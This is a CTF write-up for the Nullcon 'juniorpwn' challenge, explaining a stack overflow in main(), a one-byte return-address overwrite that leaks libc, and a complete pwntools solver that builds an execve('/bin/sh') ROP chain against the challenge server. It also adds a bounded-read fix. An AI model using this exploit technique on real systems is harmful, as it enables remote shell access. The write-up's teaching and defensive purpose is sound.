64-bit ELF binary; there is a buffer overflow bug in the main() function:

```c
int __fastcall main(int argc, const char **argv, const char **envp)
{
    char buf[512]; // [rsp+0h] [rbp-200h] BYREF

    setbuf(_bss_start, 0LL);
    puts("You shell play a game against @gehaxelt (again)! Win it to get ./flag.txt!");
    puts("What's your name?");
    read(1, buf, 0x400uLL);
    printf("Ok, it's your turn, %s!\n", buf);
    puts("You lost! Sorry :-(");
    return 0;
}
```

No PIE and no canary, but there is no gadget we can use to leak libc, such as a `pop rdi` or the `__libc_csu_init` gadget. To solve this, I overwrite the least significant byte of the saved `__libc_start_main` return address with `libc_start_main_ret - 7`; with this we return into main again and get the libc leak.
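For contrast, here is the fixed shape of the vulnerable read/printf pair. This is an added example written for this page, not the challenge's code: `store_name` and `read_name` are hypothetical helpers that bound the copy by the destination size (so the saved rbp and return address are out of reach) and always NUL-terminate (so `printf("%s")` cannot walk past the buffer and disclose the return address).

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Copy at most dstsz-1 bytes of src into dst, always NUL-terminate, and drop
 * one trailing newline. src may alias dst. Returns the bytes stored.
 * (Hypothetical helper written for this example, not the challenge's code.) */
size_t store_name(char *dst, size_t dstsz, const char *src, size_t n)
{
    if (dst == NULL || dstsz == 0)
        return 0;
    if (n > dstsz - 1)
        n = dstsz - 1;                 /* truncate instead of overflowing */
    memmove(dst, src, n);
    dst[n] = '\0';                     /* printf("%s") now stops inside dst */
    if (n > 0 && dst[n - 1] == '\n')
        dst[--n] = '\0';
    return n;
}

/* Bounded replacement for the challenge's read(1, buf, 0x400): the read is
 * limited by the destination size, so the saved rbp and return address are
 * never written, and the result is NUL-terminated before printf sees it. */
ssize_t read_name(int fd, char *buf, size_t bufsz)
{
    if (buf == NULL || bufsz == 0)
        return -1;
    ssize_t n = read(fd, buf, bufsz - 1);
    if (n < 0) {
        buf[0] = '\0';
        return -1;
    }
    return (ssize_t)store_name(buf, bufsz, buf, (size_t)n);
}

/* Self-check with constructed input: 0x400 bytes of 'A' (the size the original
 * read() accepted) offered to a 512-byte buffer. Returns 1 when the data is
 * truncated to 511 bytes and NUL-terminated, 0 otherwise. */
int check_oversized_input(void)
{
    char big[0x400], buf[512];
    memset(big, 'A', sizeof big);
    size_t n = store_name(buf, sizeof buf, big, sizeof big);
    return n == 511 && buf[511] == '\0' && strlen(buf) == 511;
}
```

With this shape the 0x208-byte input from the writeup is cut at 511 bytes and the second `printf` prints only the name, so neither the return address overwrite nor the stack leak is reachable.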

Solver:
```python
from pwn import *
from sys import argv

elf = context.binary = ELF("./juniorpwn.bak_patched")
p = process("./juniorpwn.bak_patched")
libc = ELF("./libc.so.6")

HOST = '52.59.124.14'
PORT = 10034
cmd = """
b*0x00000000004011CA
"""
mode = argv[1] if len(argv) > 1 else ''
if mode == 'gdb':
    gdb.attach(p, cmd)
elif mode == 'rm':
    p = remote(HOST, PORT)

# 0x200 bytes of buf plus 8 bytes of saved rbp, then a one-byte overwrite of the
# least significant byte of the saved return address (libc_start_main_ret - 7)
payload = b'A'*0x208
payload += b'\xc3'

p.sendafter(b'name?\n', payload)
p.recvuntil(b'A'*0x208)

# printf("%s") runs past the unterminated buffer and prints the return address
leak = u64(p.recvn(6)+b'\x00'*2) + 7
libc.address = leak - 0x271ca
print(hex(leak), hex(libc.address))

# second pass through main(): replace the return address with the ROP chain
rop = ROP(libc)
rop.execve(next(libc.search(b'/bin/sh\x00')), 0, 0)
payload = b'A'*0x208
payload += rop.chain()
p.sendafter(b'name?\n', payload)

p.interactive()
```

Original writeup (https://hackmd.io/@vidner/nullcon-sksd#Juniorpwn-pwn).